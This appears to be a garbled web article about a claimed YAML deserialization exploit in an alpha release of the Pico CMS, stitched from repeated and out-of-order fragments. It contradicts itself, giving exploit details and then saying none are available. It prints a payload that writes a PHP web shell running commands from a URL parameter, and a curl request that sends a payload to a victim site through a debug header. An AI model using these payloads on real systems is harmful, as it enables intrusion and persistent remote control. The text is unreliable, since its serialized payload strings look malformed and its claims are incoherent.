The Pico team has released Pico 3.0.0-alpha.3 which replaces parseYaml() with a secure wrapper:
// Fixed code
$yamlParser = new Parser();
$parsed = $yamlParser->parse($yamlString, Yaml::PARSE_OBJECT_FOR_MAP);
Do not use alpha.2 in production. Ever.
The root cause lies in a dangerous combination of two features introduced in the alpha branch: Twig template caching and YAML parameter parsing. Pico 3.0.0-alpha.2 Exploit
A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.
!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"
Once shell.php is written, the attacker has permanent access. The Pico team has released Pico 3
The attacker sends a POST request to the index page with a malicious YAML payload in the X-Pico-Debug header (or a theme parameter).
curl -X POST https://victim.com/pico/ \
-H "X-Pico-Debug: !php/object \"O:1:\"S\":1:s:4:\"exec\";s:18:\"system('id > pwn.txt')\";\"" \
-d "content=test"
Without specific details on the exploit, we can discuss general implications and how such vulnerabilities are typically addressed: Do not use alpha
To understand how this exploit evolved, review the timeline: